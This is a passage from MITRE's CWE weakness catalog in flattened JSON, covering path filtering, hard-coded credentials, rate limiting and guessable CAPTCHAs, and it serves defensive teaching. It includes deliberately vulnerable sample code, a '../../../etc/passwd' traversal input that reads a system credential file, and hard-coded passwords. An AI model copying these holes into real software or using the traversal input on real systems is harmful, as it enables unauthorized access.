Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"797":{"attr":{"@_ID":"797","@_Name":"Only Filtering Special Elements at an Absolute Position","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. \\"byte number 10\\"), thereby missing remaining special elements that may exist before sending it to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"795","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-4"},"Intro_Text":"The following code takes untrusted input and uses a substring function to filter a 3-character \\"../\\" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq \'../\') {}my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""],"xhtml:div":{"#text":"$Username = substr($Username, 3);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the if function is only looking for a substring of \\"../\\" between the 0 and 2 position, it only removes that specific \\"../\\" element. So an input value such as:","will have the first \\"../\\" filtered, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"798":{"attr":{"@_ID":"798","@_Name":"Use of Hard-coded Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.","Extended_Description":{"xhtml:p":["Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the software administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials.","Outbound: the software connects to another system or component, and it contains hard-coded credentials for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access to the account in question."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Other"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Credential storage in configuration files is findable using black box methods, but the use of hard-coded credentials for an incoming authentication routine typically involves an account that is not visible outside of the code.","Effectiveness":"Moderate"},{"Method":"Automated Static Analysis","Description":"Automated white box techniques have been published for detecting hard-coded credentials for incoming authentication, but there is some expert disagreement regarding their effectiveness and applicability to a broad range of methods."},{"Method":"Manual Static Analysis","Description":"This weakness may be detectable using manual code analysis. Unless authentication is decentralized and applied throughout the software, there can be sufficient time for the analyst to find incoming authentication routines and examine the program logic looking for usage of hard-coded credentials. Configuration files could also be analyzed.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Dynamic Analysis","Description":{"xhtml:p":["For hard-coded credentials in incoming authentication: use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using call trees or similar artifacts from the output, examine the associated behaviors and see if any of them appear to be comparing the input to a fixed string or value."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Network Sniffer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].","In Windows environments, the Encrypted File System (EFS) may provide some protection."]}},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password or key."},{"Phase":"Architecture and Design","Description":"If the software must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.","Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks."]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2772","Description":"SCADA system uses a hard-coded password to protect back-end database containing authorization information, exploited by Stuxnet worm","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772"},{"Reference":"CVE-2010-2073","Description":"FTP server library uses hard-coded usernames and passwords for three default accounts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073"},{"Reference":"CVE-2010-1573","Description":"Chain: Router firmware uses hard-coded username and password for access to debug functionality, which can be used to execute arbitrary code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1573"},{"Reference":"CVE-2008-2369","Description":"Server uses hard-coded authentication key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2369"},{"Reference":"CVE-2008-0961","Description":"Backup product uses hard-coded username and password, allowing attackers to bypass authentication via the RPC interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0961"},{"Reference":"CVE-2008-1160","Description":"Security appliance uses hard-coded password allowing attackers to gain root access","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1160"},{"Reference":"CVE-2006-7142","Description":"Drive encryption product stores hard-coded cryptographic keys for encrypted configuration files in executable programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-3716","Description":"VoIP product uses unchangeable hard-coded public credentials that cannot be changed, which allows attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3716"},{"Reference":"CVE-2005-3803","Description":"VoIP product uses hard coded public and private SNMP community strings that cannot be changed, which allows remote attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3803"},{"Reference":"CVE-2005-0496","Description":"Backup product contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0496"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-798"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"191"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Key Management Issues&#34; Page 272"}},{"attr":{"@_External_Reference_ID":"REF-729"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-798"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"More abstract entry for hard-coded password and hard-coded cryptographic key."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"799":{"attr":{"@_ID":"799","@_Name":"Improper Control of Interaction Frequency","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.","Extended_Description":"This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insufficient anti-automation","Description":"The term \\"insufficient anti-automation\\" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader."},{"Term":"Brute force","Description":"Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Other"],"Impact":["DoS: Resource Consumption (Other)","Bypass Protection Mechanism","Other"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int count = 0;while ((isValidUser == 0) &amp;&amp; (count &lt; MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1876","Description":"Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1876"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"804":{"attr":{"@_ID":"804","@_Name":"Guessable CAPTCHA","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.","Extended_Description":{"xhtml:p":["An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.","There can be several different causes of a guessable CAPTCHA:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["An audio or visual image that does not have sufficient distortion from the unobfuscated source image.","A question is generated that with a format that can be automatically recognized, such as a math question.","A question for which the number of possible answers is limited, such as birth years or favorite sports teams.","A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular actors.","Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the 